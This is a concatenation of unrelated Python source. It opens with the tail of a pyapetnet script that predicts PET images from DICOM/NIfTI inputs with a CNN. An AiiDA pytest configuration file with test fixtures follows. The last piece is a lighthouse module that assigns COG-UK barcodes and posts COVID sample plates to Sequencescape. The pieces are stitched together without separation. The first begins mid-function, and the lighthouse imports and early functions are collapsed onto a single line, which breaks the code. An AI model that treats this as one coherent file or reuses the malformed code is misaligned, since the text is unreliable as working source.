        pred_regrid = aff_transform(pred, np.linalg.inv(o_aff) @ mr_affine, mr.shape,
                                    cval = pred.min(), os0 = oss[0], os1 = oss[1], os2 = oss[2])
        nib.save(nib.Nifti1Image(pred_regrid, mr_affine), os.path.join(output_dir, output_name))
    else:
        nib.save(nib.Nifti1Image(pred, o_aff), os.path.join(output_dir, output_name))

    if verbose:
        print(f'wrote prediction to: {os.path.join(output_dir, output_name)}')

    #------------------------------------------------------------------
    # show the results
    if show:
        pmax = np.percentile(pred, 99.9)
        mmax = np.percentile(mr_preproc, 99.9)

        ims = [{'vmin': 0, 'vmax': mmax, 'cmap': plt.cm.Greys_r},
               {'vmin': 0, 'vmax': pmax},
               {'vmin': 0, 'vmax': pmax}]
        vi = pv.ThreeAxisViewer([np.flip(mr_preproc, (0, 1)),
                                 np.flip(pet_preproc, (0, 1)),
                                 np.flip(pred, (0, 1))],
                                imshow_kwargs = ims)
        plt.show()

#------------------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------------------------

def predict_from_dicom():
    parser = argparse.ArgumentParser(description = 'pyapetnet prediction of anatomy-guided PET reconstruction')

    parser.add_argument('pet_dcm_dir', help = 'absolute path of PET input dicom directory')
    parser.add_argument('mr_dcm_dir', help = 'absolute path of MR input dicom directory')
    parser.add_argument('model_name', help = 'name of trained CNN')
    parser.add_argument('--pet_dcm_pattern', help = 'file pattern for PET dicom dir', default = '*')
    parser.add_argument('--mr_dcm_pattern', help = 'file pattern for MR dicom dir', default = '*')
    parser.add_argument('--model_path', help = 'absolute path of directory containing trained models',
                        default = None)
    parser.add_argument('--output_dir', help = 'name of the output directory', default = '.')
    parser.add_argument('--output_name', help = 'basename of prediction file', default = None)
    parser.add_argument('--no_coreg', help = 'do not coregister input volumes', action = 'store_true')
    parser.add_argument('--no_crop', help = 'do not crop volumes to MR bounding box', action = 'store_true')
    parser.add_argument('--show', help = 'show the results', action = 'store_true')
    parser.add_argument('--verbose', help = 'print (extra) verbose output', action = 'store_true')
    parser.add_argument('--no_preproc_save', help = 'do not save preprocessed volumes', action = 'store_true')
    parser.add_argument('--output_on_mr_grid', help = 'regrid the CNN output to the original MR grid',
                        action = 'store_true')

    args = parser.parse_args()

    #-------------------------------------------------------------------------------------------------
    # load modules

    import pyapetnet
    from pyapetnet.preprocessing import preprocess_volumes
    from pyapetnet.utils import load_nii_in_ras
    from pymirc.fileio import DicomVolume, write_3d_static_dicom

    import nibabel as nib
    import json

    import tensorflow as tf
    import numpy as np
    import matplotlib.pyplot as plt

    import pymirc.viewer as pv
    from pymirc.image_operations import aff_transform
    from pyapetnet.utils import flip_ras_lps, pet_dcm_keys_to_copy

    from warnings import warn

    #-------------------------------------------------------------------------------------------------
    # parse input parameters

    pet_dcm_dir = args.pet_dcm_dir
    mr_dcm_dir = args.mr_dcm_dir
    pet_dcm_pattern = args.pet_dcm_pattern
    mr_dcm_pattern = args.mr_dcm_pattern
    model_name = args.model_name
    output_dir = args.output_dir
    output_name = args.output_name

    if output_name is None:
        output_name = f'prediction_{model_name}'

    model_path = args.model_path
    if model_path is None:
        model_path = os.path.join(os.path.dirname(pyapetnet.__file__), 'trained_models')

    coreg_inputs = not args.no_coreg
    crop_mr = not args.no_crop
    show = args.show
    verbose = args.verbose
    save_preproc = not args.no_preproc_save
    output_on_mr_grid = args.output_on_mr_grid

    #-------------------------------------------------------------------------------------------------
    # load the trained model

    co = {'ssim_3d_loss': None, 'mix_ssim_3d_mae_loss': None}

    if verbose:
        print(f'loading CNN {os.path.join(model_path, model_name)}')

    model = tf.keras.models.load_model(os.path.join(model_path, model_name), custom_objects = co)

    # load the voxel size used for training
    with open(os.path.join(model_path, model_name, 'config.json')) as f:
        cfg = json.load(f)

    training_voxsize = cfg['internal_voxsize'] * np.ones(3)

    #------------------------------------------------------------------
    # load and preprocess the input PET and MR volumes
    pet_dcm = DicomVolume(os.path.join(pet_dcm_dir, pet_dcm_pattern))
    mr_dcm = DicomVolume(os.path.join(mr_dcm_dir, mr_dcm_pattern))

    pet = pet_dcm.get_data()
    mr = mr_dcm.get_data()

    pet_affine = pet_dcm.affine
    mr_affine = mr_dcm.affine

    # preprocess the input volumes (coregistration, interpolation and intensity normalization)
    pet_preproc, mr_preproc, o_aff, pet_scale, mr_scale = preprocess_volumes(
        pet, mr, pet_affine, mr_affine, training_voxsize, perc = 99.99,
        coreg = coreg_inputs, crop_mr = crop_mr)

    #------------------------------------------------------------------
    # the actual CNN prediction
    x = [np.expand_dims(np.expand_dims(pet_preproc, 0), -1),
         np.expand_dims(np.expand_dims(mr_preproc, 0), -1)]
    pred = model.predict(x).squeeze()

    # undo the intensity normalization
    pred *= pet_scale
    pet_preproc *= pet_scale
    mr_preproc *= mr_scale

    #------------------------------------------------------------------
    # save the preprocessed input and output
    # dicom volumes are read as LPS, but nifti volumes have to be in RAS
    os.makedirs(output_dir, exist_ok = True)

    if save_preproc:
        nib.save(nib.Nifti1Image(*flip_ras_lps(pet_preproc, o_aff)),
                 os.path.join(output_dir, 'pet_preproc.nii'))
        if verbose:
            print(f'wrote pre-processed PET to: {os.path.join(output_dir, "pet_preproc.nii")}')

        nib.save(nib.Nifti1Image(*flip_ras_lps(mr_preproc, o_aff)),
                 os.path.join(output_dir, 'mr_preproc.nii'))
        if verbose:
            print(f'wrote pre-processed MR to: {os.path.join(output_dir, "mr_preproc.nii")}')

        # save the intensity normalization factors
        np.savetxt(os.path.join(output_dir, 'preproc_scaling_factors.txt'),
                   np.array([pet_scale, mr_scale]))
        if verbose:
            print(f'wrote scaling factors to: {os.path.join(output_dir, "preproc_scaling_factors.txt")}')

    if output_on_mr_grid:
        oss = np.ceil(np.linalg.norm(mr_affine[:-1, :-1], axis = 0) / training_voxsize).astype(int)
        pred_regrid = aff_transform(pred, np.linalg.inv(o_aff) @ mr_affine, mr.shape,
                                    cval = pred.min(), os0 = oss[0], os1 = oss[1], os2 = oss[2])
        nib.save(nib.Nifti1Image(*flip_ras_lps(pred_regrid, mr_affine)),
                 os.path.join(output_dir, f'{output_name}.nii'))
    else:
        nib.save(nib.Nifti1Image(*flip_ras_lps(pred, o_aff)),
                 os.path.join(output_dir, f'{output_name}.nii'))

    #------------------------------------------------------------------
    # save prediction also as dicom

    # get a list of dicom keys to copy from the original PET dicom header
    dcm_kwargs = {}
    for key in pet_dcm_keys_to_copy():
        try:
            dcm_kwargs[key] = getattr(pet_dcm.firstdcmheader, key)
        except AttributeError:
            warn('Cannot copy tag ' + key)

    # write the dicom volume
    output_dcm_dir = os.path.join(output_dir, output_name)
    if not os.path.exists(output_dcm_dir):
        if output_on_mr_grid:
            write_3d_static_dicom(pred_regrid, output_dcm_dir, affine = mr_affine,
                                  ReconstructionMethod = 'CNN MAP Bowsher',
                                  SeriesDescription = f'CNN MAP Bowsher {model_name}',
                                  **dcm_kwargs)
        else:
            write_3d_static_dicom(pred, output_dcm_dir, affine = o_aff,
                                  ReconstructionMethod = 'CNN MAP Bowsher',
                                  SeriesDescription = f'CNN MAP Bowsher {model_name}',
                                  **dcm_kwargs)
    else:
        warn('Output dicom directory already exists. Not overwriting it')

    #------------------------------------------------------------------
    # show the results
    if show:
        pmax = np.percentile(pred, 99.9)
        mmax = np.percentile(mr_preproc, 99.9)

        ims = [{'vmin': 0, 'vmax': mmax, 'cmap': plt.cm.Greys_r},
               {'vmin': 0, 'vmax': pmax},
               {'vmin': 0, 'vmax': pmax}]
        vi = pv.ThreeAxisViewer([mr_preproc, pet_preproc, pred], imshow_kwargs = ims)
        plt.show()
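if __name__ == '__main__':
    # Usage illustration (editor's addition): these functions are console-script
    # entry points that read `sys.argv` themselves, so one way to exercise them
    # from plain Python is to patch `sys.argv` before calling them. The file
    # names and model name below are placeholders, not files shipped with the
    # package; substitute real inputs before running.
    import sys

    # equivalent of: pyapetnet_predict_from_nifti pet.nii mr.nii my_model --output_dir out --verbose
    sys.argv = ['pyapetnet_predict_from_nifti',
                'pet.nii', 'mr.nii', 'my_model',
                '--output_dir', 'out',
                '--verbose']
    predict_from_nifti()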
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved.                     #
# This file is part of the AiiDA code.                                    #
#                                                                         #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file        #
# For further information please visit http://www.aiida.net               #
###########################################################################
# pylint: disable=redefined-outer-name
"""Configuration file for pytest tests."""
import os

import pytest

from aiida.manage.configuration import Config, Profile, get_config

pytest_plugins = ['aiida.manage.tests.pytest_fixtures', 'sphinx.testing.fixtures']  # pylint: disable=invalid-name


@pytest.fixture()
def non_interactive_editor(request):
    """Fixture to patch click's `Editor.edit_file`.

    In `click==7.1` the `Editor.edit_file` command was changed to escape the `os.environ['EDITOR']` command. Our
    tests are currently abusing this variable to define an automated vim command in order to make an interactive
    command non-interactive, and escaping it makes bash interpret the command and its arguments as a single command
    instead. Here we patch the method to remove the escaping of the editor command.

    :param request: the command to set for the editor that is to be called
    """
    from unittest.mock import patch

    from click._termui_impl import Editor

    os.environ['EDITOR'] = request.param
    os.environ['VISUAL'] = request.param

    def edit_file(self, filename):
        import subprocess

        import click

        editor = self.get_editor()
        if self.env:
            environ = os.environ.copy()
            environ.update(self.env)
        else:
            environ = None
        try:
            process = subprocess.Popen(
                f'{editor} {filename}',  # This is the line that we change removing `shlex_quote`
                env=environ,
                shell=True,
            )
            exit_code = process.wait()
            if exit_code != 0:
                raise click.ClickException(f'{editor}: Editing failed!')
        except OSError as exception:
            raise click.ClickException(f'{editor}: Editing failed: {exception}')

    with patch.object(Editor, 'edit_file', edit_file):
        yield


@pytest.fixture(scope='function')
def fixture_sandbox():
    """Return a `SandboxFolder`."""
    from aiida.common.folders import SandboxFolder
    with SandboxFolder() as folder:
        yield folder


@pytest.fixture
def generate_calc_job():
    """Fixture to construct a new `CalcJob` instance and call `prepare_for_submission` for testing `CalcJob` classes.

    The fixture will return the `CalcInfo` returned by `prepare_for_submission` and the temporary folder that was
    passed to it, into which the raw input files will have been written.
    """

    def _generate_calc_job(folder, entry_point_name, inputs=None, return_process=False):
        """Fixture to generate a mock `CalcInfo` for testing calculation jobs."""
        from aiida.engine.utils import instantiate_process
        from aiida.manage.manager import get_manager
        from aiida.plugins import CalculationFactory

        inputs = inputs or {}
        manager = get_manager()
        runner = manager.get_runner()

        process_class = CalculationFactory(entry_point_name)
        process = instantiate_process(runner, process_class, **inputs)

        if return_process:
            return process

        return process.prepare_for_submission(folder)

    return _generate_calc_job


@pytest.fixture
def generate_work_chain():
    """Generate an instance of a `WorkChain`."""

    def _generate_work_chain(entry_point, inputs=None):
        """Generate an instance of a `WorkChain` with the given entry point and inputs.

        :param entry_point: entry point name of the work chain subclass.
        :param inputs: inputs to be passed to process construction.
        :return: a `WorkChain` instance.
        """
        from aiida.engine.utils import instantiate_process
        from aiida.manage.manager import get_manager
        from aiida.plugins import WorkflowFactory

        inputs = inputs or {}
        process_class = WorkflowFactory(entry_point) if isinstance(entry_point, str) else entry_point
        runner = get_manager().get_runner()
        process = instantiate_process(runner, process_class, **inputs)

        return process

    return _generate_work_chain


@pytest.fixture
def generate_calculation_node():
    """Generate an instance of a `CalculationNode`."""
    from aiida.engine import ProcessState

    def _generate_calculation_node(process_state=ProcessState.FINISHED, exit_status=None, entry_point=None):
        """Generate an instance of a `CalculationNode`.

        :param process_state: state to set
        :param exit_status: optional exit status, will be set to `0` if `process_state` is `ProcessState.FINISHED`
        :return: a `CalculationNode` instance.
        """
        from aiida.orm import CalculationNode

        if process_state is ProcessState.FINISHED and exit_status is None:
            exit_status = 0

        node = CalculationNode(process_type=entry_point)
        node.set_process_state(process_state)

        if exit_status is not None:
            node.set_exit_status(exit_status)

        return node

    return _generate_calculation_node


@pytest.fixture
def create_empty_config_instance(tmp_path) -> Config:
    """Create a temporary configuration instance.

    This creates a temporary directory with a clean `.aiida` folder and basic configuration file. The currently
    loaded configuration and profile are stored in memory and are automatically restored at the end of this context
    manager.

    :return: a new empty config instance.
    """
    from aiida.common.utils import Capturing
    from aiida.manage import configuration
    from aiida.manage.configuration import settings, load_profile, reset_profile

    # Store the current configuration instance and config directory path
    current_config = configuration.CONFIG
    current_config_path = current_config.dirpath
    current_profile_name = configuration.PROFILE.name

    reset_profile()
    configuration.CONFIG = None

    # Create a temporary folder, set it as the current config directory path and reset the loaded configuration
    settings.AIIDA_CONFIG_FOLDER = str(tmp_path)

    # Create the instance base directory structure, the config file and a dummy profile
    settings.create_instance_directories()

    # The constructor of `Config` called by `load_config` will print warning messages about migrating it
    with Capturing():
        configuration.CONFIG = configuration.load_config(create=True)

    yield get_config()

    # Reset the config folder path and the config instance. Note this will always be executed after the yield no
    # matter what happened in the test that used this fixture.
    reset_profile()
    settings.AIIDA_CONFIG_FOLDER = current_config_path
    configuration.CONFIG = current_config
    load_profile(current_profile_name)


@pytest.fixture
def create_profile() -> Profile:
    """Create a new profile instance.

    :return: the profile instance.
    """

    def _create_profile(name, **kwargs):

        repository_dirpath = kwargs.pop('repository_dirpath', get_config().dirpath)

        profile_dictionary = {
            'default_user': kwargs.pop('default_user', 'dummy@localhost'),
            'database_engine': kwargs.pop('database_engine', 'postgresql_psycopg2'),
            'database_backend': kwargs.pop('database_backend', 'django'),
            'database_hostname': kwargs.pop('database_hostname', 'localhost'),
            'database_port': kwargs.pop('database_port', 5432),
            'database_name': kwargs.pop('database_name', name),
            'database_username': kwargs.pop('database_username', 'user'),
            'database_password': kwargs.pop('database_password', 'pass'),
            'repository_uri': f"file:///{os.path.join(repository_dirpath, f'repository_{name}')}",
        }

        return Profile(name, profile_dictionary)

    return _create_profile


@pytest.fixture
def manager(aiida_profile):  # pylint: disable=unused-argument
    """Get the ``Manager`` instance of the currently loaded profile."""
    from aiida.manage.manager import get_manager
    return get_manager()


@pytest.fixture
def event_loop(manager):
    """Get the event loop instance of the currently loaded profile.

    This is automatically called as a fixture for any test marked with ``@pytest.mark.asyncio``.
    """
    yield manager.get_runner().loop


@pytest.fixture
def backend(manager):
    """Get the ``Backend`` instance of the currently loaded profile."""
    return manager.get_backend()


@pytest.fixture
def communicator(manager):
    """Get the ``Communicator`` instance of the currently loaded profile to communicate with RabbitMQ."""
    return manager.get_communicator()


@pytest.fixture
def skip_if_not_django(backend):
    """Fixture that will skip any test that uses it when a profile is loaded with any other backend than Django."""
    from aiida.orm.implementation.django.backend import DjangoBackend
    if not isinstance(backend, DjangoBackend):
        pytest.skip('this test should only be run for the Django backend.')


@pytest.fixture
def skip_if_not_sqlalchemy(backend):
    """Fixture that will skip any test that uses it when a profile is loaded with any other backend than SqlAlchemy."""
    from aiida.orm.implementation.sqlalchemy.backend import SqlaBackend
    if not isinstance(backend, SqlaBackend):
        pytest.skip('this test should only be run for the SqlAlchemy backend.')


@pytest.fixture(scope='function')
def override_logging():
    """Temporarily set the AiiDA and database log levels to ``DEBUG``, restoring the previous options afterwards."""
    from aiida.common.log import configure_logging

    config = get_config()

    try:
        config.set_option('logging.aiida_loglevel', 'DEBUG')
        config.set_option('logging.db_loglevel', 'DEBUG')
        configure_logging(with_orm=True)
        yield
    finally:
        config.unset_option('logging.aiida_loglevel')
        config.unset_option('logging.db_loglevel')
        configure_logging(with_orm=True)
import copy import logging from http import HTTPStatus from typing import Any, Dict, List, Optional import requests from flask import current_app as app from lighthouse.constants import ( FIELD_COG_BARCODE, FIELD_COORDINATE, FIELD_DART_CONTROL, FIELD_DART_DESTINATION_BARCODE, FIELD_DART_DESTINATION_COORDINATE, FIELD_DART_LAB_ID, FIELD_DART_RNA_ID, FIELD_DART_ROOT_SAMPLE_ID, FIELD_DART_SOURCE_BARCODE, FIELD_DART_SOURCE_COORDINATE, FIELD_LAB_ID, FIELD_PLATE_BARCODE, FIELD_RESULT, FIELD_RNA_ID, FIELD_ROOT_SAMPLE_ID, FIELD_SOURCE, POSITIVE_SAMPLES_MONGODB_FILTER, STAGE_MATCH_POSITIVE, ) from lighthouse.exceptions import ( DataError, MissingCentreError, MissingSourceError, MultipleCentresError, ) from lighthouse.helpers.dart_db import find_dart_source_samples_rows from lighthouse.helpers.mysql_db import create_mysql_connection_engine, get_table from sqlalchemy.sql.expression import and_ # type: ignore from sqlalchemy.sql.expression import bindparam # type: ignore logger = logging.getLogger(__name__) class UnmatchedSampleError(Exception): pass def add_cog_barcodes(samples: List[Dict[str, str]]) -> Optional[str]: centre_name = confirm_centre(samples) centre_prefix = get_centre_prefix(centre_name) num_samples = len(samples) logger.info(f"Getting COG-UK barcodes for {num_samples} samples") baracoda_url = ( f"http://{app.config["BARACODA_URL"]}" f"/barcodes_group/{centre_prefix}/new?count={num_samples}" ) retries = app.config["BARACODA_RETRY_ATTEMPTS"] success_operation = False except_obj = None while retries > 0: try: response = requests.post(baracoda_url) if response.status_code == HTTPStatus.CREATED: success_operation = True retries = 0 barcodes = response.json()["barcodes_group"]["barcodes"] for (sample, barcode) in zip(samples, barcodes): sample[FIELD_COG_BARCODE] = barcode else: retries = retries - 1 logger.error("Unable to create COG barcodes") logger.error(response.json()) except_obj = Exception("Unable to create COG barcodes") except requests.ConnectionError: retries = retries - 1 logger.error("Unable to access baracoda") except_obj = requests.ConnectionError("Unable to access baracoda") if not success_operation and except_obj is not None: raise except_obj # return centre prefix # TODO: I didn't know how else to get centre prefix? 
    return centre_prefix


def get_centre_prefix(centre_name: str) -> Optional[str]:
    logger.debug(f"Getting the prefix for '{centre_name}'")
    try:
        # get the centre collection
        centres = app.data.driver.db.centres

        # use a case insensitive search for the centre name
        filter = {"name": {"$regex": f"^(?i){centre_name}$"}}

        assert centres.count_documents(filter) == 1

        centre = centres.find_one(filter)

        prefix = centre["prefix"]

        logger.debug(f"Prefix for '{centre_name}' is '{prefix}'")

        return prefix
    except AssertionError as e:
        # catch AssertionError before the generic Exception handler below:
        # AssertionError subclasses Exception, so the broader handler would
        # otherwise swallow it and this DataError would never be raised
        logger.exception(e)
        raise DataError("Multiple centres with the same name")
    except Exception as e:
        logger.exception(e)
        return None


def find_samples(query: Optional[Dict[str, Any]]) -> Optional[List[Dict[str, Any]]]:
    if query is None:
        return None

    samples = app.data.driver.db.samples

    samples_for_barcode = list(samples.find(query))

    logger.info(f"Found {len(samples_for_barcode)} samples")

    return samples_for_barcode


def count_samples(query: Dict[str, Any]) -> int:
    samples = app.data.driver.db.samples

    return samples.count_documents(query)


# TODO: remove once we are sure that we dont need anything other than positives
def get_samples(plate_barcode: str) -> Optional[List[Dict[str, Any]]]:
    samples_for_barcode = find_samples({FIELD_PLATE_BARCODE: plate_barcode})

    return samples_for_barcode


def get_positive_samples(plate_barcode: str) -> Optional[List[Dict[str, Any]]]:
    """Get a list of documents which correspond to filtered positive samples for a specific
    plate.

    Args:
        plate_barcode (str): the barcode of the plate to get samples for.

    Returns:
        Optional[List[Dict[str, Any]]]: the list of samples for this plate.
    """
    samples_collection = app.data.driver.db.samples

    # The pipeline defines stages which execute in sequence
    pipeline = [
        # 1. We are only interested in the samples for a particular plate
        {"$match": {FIELD_PLATE_BARCODE: plate_barcode}},
        # 2. Then run the positive match stage
        STAGE_MATCH_POSITIVE,
    ]

    samples_for_barcode = list(samples_collection.aggregate(pipeline))

    logger.info(f"Found {len(samples_for_barcode)} samples")

    return samples_for_barcode


def count_positive_samples(plate_barcode: str) -> int:
    query_filter = copy.deepcopy(POSITIVE_SAMPLES_MONGODB_FILTER)

    query_filter[FIELD_PLATE_BARCODE] = plate_barcode

    samples_for_barcode = count_samples(query_filter)

    return samples_for_barcode


def has_sample_data(plate_barcode: str) -> bool:
    sample_count = count_samples({FIELD_PLATE_BARCODE: plate_barcode})

    return sample_count > 0


def row_is_normal_sample(row):
    control_value = getattr(row, FIELD_DART_CONTROL)
    return control_value is None or control_value == "NULL" or control_value == ""


def rows_without_controls(rows):
    # build the result with a comprehension rather than accumulating into a
    # variable named `list`, which shadows the built-in
    return [row for row in rows if row_is_normal_sample(row)]


def rows_with_controls(rows):
    return [row for row in rows if not row_is_normal_sample(row)]


def query_for_cherrypicked_samples(rows):
    if rows is None or len(rows) == 0:
        return None

    mongo_query = []
    for row in rows_without_controls(rows):
        sample_query = {
            FIELD_ROOT_SAMPLE_ID: getattr(row, FIELD_DART_ROOT_SAMPLE_ID),
            FIELD_RNA_ID: getattr(row, FIELD_DART_RNA_ID),
            FIELD_LAB_ID: getattr(row, FIELD_DART_LAB_ID),
        }
        mongo_query.append(sample_query)
    return {"$or": mongo_query}


def equal_row_and_sample(row, sample):
    return (
        (sample[FIELD_ROOT_SAMPLE_ID] == getattr(row, FIELD_DART_ROOT_SAMPLE_ID))
        and (sample[FIELD_RNA_ID] == getattr(row, FIELD_DART_RNA_ID))
        and (sample[FIELD_LAB_ID] == getattr(row, FIELD_DART_LAB_ID))
    )


def find_sample_matching_row(row, samples):
    # iterate directly over the samples rather than indexing by position
    for sample in samples:
        if equal_row_and_sample(row, sample):
            return sample
    return None


def join_rows_with_samples(rows, samples):
    records = []
    for row in rows_without_controls(rows):
        records.append({"row": row_to_dict(row), "sample": find_sample_matching_row(row, samples)})

    return records


def add_controls_to_samples(rows, samples):
    control_samples = []
    for row in rows_with_controls(rows):
        control_samples.append({"row": row_to_dict(row), "sample": None})

    return samples + control_samples


def check_matching_sample_numbers(rows, samples):
    if len(samples) != len(rows_without_controls(rows)):
        msg = (
            "Mismatch in data present for destination plate: number of samples in DART and Mongo "
            "does not match"
        )
        logger.error(msg)
        raise UnmatchedSampleError(msg)


def row_to_dict(row):
    columns = [
        FIELD_DART_DESTINATION_BARCODE,
        FIELD_DART_DESTINATION_COORDINATE,
        FIELD_DART_SOURCE_BARCODE,
        FIELD_DART_SOURCE_COORDINATE,
        FIELD_DART_CONTROL,
        FIELD_DART_ROOT_SAMPLE_ID,
        FIELD_DART_RNA_ID,
        FIELD_DART_LAB_ID,
    ]
    obj = {}
    for column in columns:
        obj[column] = getattr(row, column)
    return obj


def get_cherrypicked_samples_records(barcode):
    rows = find_dart_source_samples_rows(barcode)
    samples = find_samples(query_for_cherrypicked_samples(rows))

    return join_rows_with_samples(rows, samples)


def confirm_centre(samples: List[Dict[str, str]]) -> str:
    """Confirm that the centre for all the samples is populated and the same and return the
    centre name.

    Arguments:
        samples {List} -- the list of samples to check

    Returns:
        str -- the name of the centre for these samples
    """
    logger.debug("confirm_centre()")

    try:
        # check that the 'source' field has a valid name
        for sample in samples:
            if not sample[FIELD_SOURCE]:
                raise MissingCentreError(sample)

        # create a set from the 'source' field to check we only have 1 unique centre for these
        # samples
        centre_set = {sample[FIELD_SOURCE] for sample in samples}
    except KeyError:
        raise MissingSourceError()
    else:
        if len(centre_set) > 1:
            raise MultipleCentresError()

    return centre_set.pop()


def create_post_body(barcode: str, samples: List[Dict[str, str]]) -> Dict[str, Any]:
    logger.debug(f"Creating POST body to send to SS for barcode '{barcode}'")

    wells_content = {}
    for sample in samples:
        # start each sample with empty values so a missing field trips the asserts
        # below instead of raising UnboundLocalError
        phenotype = None
        description = None
        for key, value in sample.items():
            if key.strip() == FIELD_RESULT:
                phenotype = value

            if key.strip() == FIELD_ROOT_SAMPLE_ID:
                description = value

        assert phenotype is not None
        assert description is not None
        assert sample[FIELD_COG_BARCODE] is not None

        well = {
            "content": {
                "phenotype": phenotype.strip().lower(),
                "supplier_name": sample[FIELD_COG_BARCODE],
                "sample_description": description,
            }
        }
        wells_content[sample[FIELD_COORDINATE]] = well

    body = {
        "barcode": barcode,
        "purpose_uuid": app.config["SS_UUID_PLATE_PURPOSE"],
        "study_uuid": app.config["SS_UUID_STUDY"],
        "wells": wells_content,
    }

    return {"data": {"type": "plates", "attributes": body}}


def send_to_ss(body: Dict[str, Any]) -> requests.Response:
    ss_url = f"http://{app.config["SS_HOST"]}/api/v2/heron/plates"

    logger.info(f"Sending {body} to {ss_url}")

    headers = {"X-Sequencescape-Client-Id": app.config["SS_API_KEY"]}

    try:
        response = requests.post(ss_url, json=body, headers=headers)
        logger.debug(response.status_code)
    except requests.ConnectionError:
        raise requests.ConnectionError("Unable to access SS")

    return response


def update_mlwh_with_cog_uk_ids(samples: List[Dict[str, str]]) -> None:
    """Update the MLWH to write the COG UK barcode for each sample.

    Arguments:
        samples {List[Dict[str, str]]} -- list of samples to be updated
    """
    if len(samples) == 0:
        return None

    # assign db_connection to avoid UnboundLocalError in 'finally' block, in case of exception
    db_connection = None

    try:
        data = []
        for sample in samples:
            # using 'b_' prefix for the keys because bindparam() doesn't allow you to use the real
            # column names
            data.append(
                {
                    "b_root_sample_id": sample[FIELD_ROOT_SAMPLE_ID],
                    "b_rna_id": sample[FIELD_RNA_ID],
                    "b_result": sample[FIELD_RESULT],
                    "b_cog_uk_id": sample[FIELD_COG_BARCODE],
                }
            )

        sql_engine = create_mysql_connection_engine(
            app.config["WAREHOUSES_RW_CONN_STRING"], app.config["ML_WH_DB"]
        )
        table = get_table(sql_engine, app.config["MLWH_LIGHTHOUSE_SAMPLE_TABLE"])

        stmt = (
            table.update()
            .where(
                and_(
                    table.c.root_sample_id == bindparam("b_root_sample_id"),
                    table.c.rna_id == bindparam("b_rna_id"),
                    table.c.result == bindparam("b_result"),
                )
            )
            .values(cog_uk_id=bindparam("b_cog_uk_id"))
        )
        db_connection = sql_engine.connect()

        results = db_connection.execute(stmt, data)

        rows_matched = results.rowcount
        if rows_matched != len(samples):
            msg = f"""
            Updating MLWH {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table with COG UK ids was
            only partially successful.
            Only {rows_matched} of the {len(samples)} samples had matches in the MLWH
            {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table.
            """
            logger.error(msg)
            raise UnmatchedSampleError(msg)
    except Exception as e:
        msg = f"""
        Error while updating MLWH {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table with COG UK
        ids.
        {type(e).__name__}: {str(e)}
        """
        logger.error(msg)
        raise
    finally:
        if db_connection is not None:
            db_connection.close()


def map_to_ss_columns(samples: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    mapped_samples = []

    for sample in samples:
        mapped_sample: Dict[str, Any] = {}

        mongo_row = sample["sample"]
        dart_row = sample["row"]

        try:
            if dart_row[FIELD_DART_CONTROL]:
                mapped_sample["control"] = True
                mapped_sample["control_type"] = dart_row[FIELD_DART_CONTROL]
            else:
                mapped_sample["name"] = mongo_row[FIELD_RNA_ID]
                mapped_sample["sample_description"] = mongo_row[FIELD_ROOT_SAMPLE_ID]
                mapped_sample["supplier_name"] = mongo_row[FIELD_COG_BARCODE]
                mapped_sample["phenotype"] = "positive"

            # coordinate and barcode apply to both controls and samples
            mapped_sample["coordinate"] = dart_row[FIELD_DART_DESTINATION_COORDINATE]
            mapped_sample["barcode"] = dart_row[FIELD_DART_DESTINATION_BARCODE]
        except KeyError as e:
            msg = f"""
            Error while mapping database columns to Sequencescape columns for sample
            {mongo_row[FIELD_ROOT_SAMPLE_ID]}.
            {type(e).__name__}: {str(e)}
            """
            logger.error(msg)
            raise
        mapped_samples.append(mapped_sample)

    return mapped_samples


def create_cherrypicked_post_body(barcode: str, samples: List[Dict[str, Any]]) -> Dict[str, Any]:
    logger.debug(
        f"Creating POST body to send to SS for cherrypicked plate with barcode '{barcode}'"
    )

    wells_content = {}
    for sample in samples:
        content = {}

        if "control" in sample:
            content["control"] = sample["control"]
            content["control_type"] = sample["control_type"]
        else:
            content["name"] = sample["name"]
            content["phenotype"] = sample["phenotype"]
            content["supplier_name"] = sample["supplier_name"]
            content["sample_description"] = sample["sample_description"]

        wells_content[sample["coordinate"]] = {"content": content}

    body = {
        "barcode": barcode,
        "purpose_uuid": app.config["SS_UUID_PLATE_PURPOSE_CHERRYPICKED"],
        "study_uuid": app.config["SS_UUID_STUDY_CHERRYPICKED"],
        "wells": wells_content,
    }

    return {"data": {"type": "plates", "attributes": body}}
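# A minimal, self-contained sketch of the retry pattern that add_cog_barcodes above
# implements with a counter and a success flag: try a POST a fixed number of times,
# remember the most recent failure, and raise it only if no attempt succeeded. The
# function name, URL and attempt count are illustrative assumptions, not part of the
# lighthouse codebase or its configuration.
from http import HTTPStatus
from typing import Optional

import requests


def post_with_retries(url: str, attempts: int = 3) -> requests.Response:
    last_error: Optional[Exception] = None

    for _ in range(attempts):
        try:
            response = requests.post(url)

            if response.status_code == HTTPStatus.CREATED:
                return response

            # keep the most recent unexpected response as the error to surface
            last_error = Exception(f"Unexpected status code: {response.status_code}")
        except requests.ConnectionError as error:
            last_error = error

    # all attempts failed; raise the error captured on the final attempt
    assert last_error is not None
    raise last_error


# Usage would mirror the baracoda call above, for example:
# response = post_with_retries("http://baracoda.example/barcodes_group/TEST/new?count=96")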
